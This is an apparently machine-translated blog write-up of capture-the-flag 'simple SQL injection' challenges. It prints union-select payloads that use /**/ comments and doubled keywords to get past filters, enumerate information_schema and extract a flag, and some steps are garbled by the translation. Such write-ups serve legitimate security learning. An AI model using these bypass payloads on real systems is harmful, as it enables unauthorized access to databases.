Experiment simple SQL injection 1, simple SQL injection

Time:2020-3-11

Follow the blog above.

Experiment simple SQL injection 1

Topic link: http://ctf5.shiyanbar.com/423/web/

 

Similarly, enter 1 directly with quotation marks, and an error will be returned below the result, there is a mistake, so it’s estimated that it should be closed here, character line injection, but this title, what exactly is filtered, at present I don’t know what is filtered, so let’s do it first..

Input 1 ‘and 1 = 1. Normally, it should return to normal. The result returns an error

“Chen” is filtered. Then there are other postures. Input 1 ‘and’ 1 ‘=

It turned out to be wrong. What happened? Change or try 1 ‘or’ 1 ‘=’1

All data appears, but and can’t, so it’s estimated that and has been filtered. See if it has been filtered. Double write 1 ‘and’ 1 ‘=

Enter two and results, only one and appears. Make sure that and is filtered, and the space after that is also filtered

It’s OK. I want to use / * * / to bypass filtering and use union

1’/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/’1’=’1

 

To be honest, I don’t know why the database () here doesn’t work. Please give me some advice

The next explosion shows that

1’/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/’1’=’1

Get the table name flag

 

Next, pop up the field name

1’/**/union/**/select/**/column_name/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name=’flag

But no, it’s not

 

Filter the information_schema.columnsmns to me. Double write is used here, but double write discovery will also be filtered. OK, I’ll write part of it in the middle

1’/**/union/**/select/**/column_name/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name=’flag

The result is still an error. Maybe the column name is also filtered. Here, double write the column name

1’/**/union/**/select/**/column_nacolumn_nameme/**/from/**/information_schema.coluinformation_schema.columnsmns/**/where/**/table_name=’flag

The field name flag appears here.

Next, go directly to 1 ‘/ * * / Union / * * / select / * * / Flag / * * / from / * * / Flag / * * / where / * * /’1’ =

 

Get flag

 

In the second question, you can get the name of the database and the indication just like the first two sentences, but you don’t need to double write when the third sentence explodes the field name

1’/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=’flag

 

You can also get the indication and field names. They are also flags and flags

 

1’/**/union/**/select/**/flag/**/from/**/flag/**/where/**/’1’=’1

 

You can get the answer

I don’t know about the simple SQL injection 3 yet. I haven’t learned the fuzzy test yet. It will be updated in two days. I will definitely learn it